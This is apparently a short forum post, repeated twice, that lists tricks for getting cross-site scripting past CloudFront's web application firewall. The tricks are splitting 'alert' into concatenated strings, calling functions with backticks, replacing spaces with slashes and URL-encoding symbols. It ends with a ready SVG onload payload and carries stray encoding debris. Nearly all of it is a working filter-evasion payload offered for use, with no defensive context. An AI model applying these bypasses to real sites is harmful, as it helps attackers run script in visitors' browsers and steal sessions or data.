03-06-25, 08:01 PM
Cloudfront XSS WAF Bypassing.
1) alert = window["al"+"ert"]
2) bypass()with ``
3) replace space with /
4) encode symbols:
🔹< = %3c
🔹> = %3e
🔹" = %22
🔹[ = %5b
🔹] = %5d
🔹` = %60
Not Encoded Payload:
<svg/onload=window["al"+"ert"]`1337`>
Â
​​​​​​​
​​​​​​​ 
1) alert = window["al"+"ert"]
2) bypass()with ``
3) replace space with /
4) encode symbols:
🔹< = %3c
🔹> = %3e
🔹" = %22
🔹[ = %5b
🔹] = %5d
🔹` = %60
Not Encoded Payload:
<svg/onload=window["al"+"ert"]`1337`>
Â



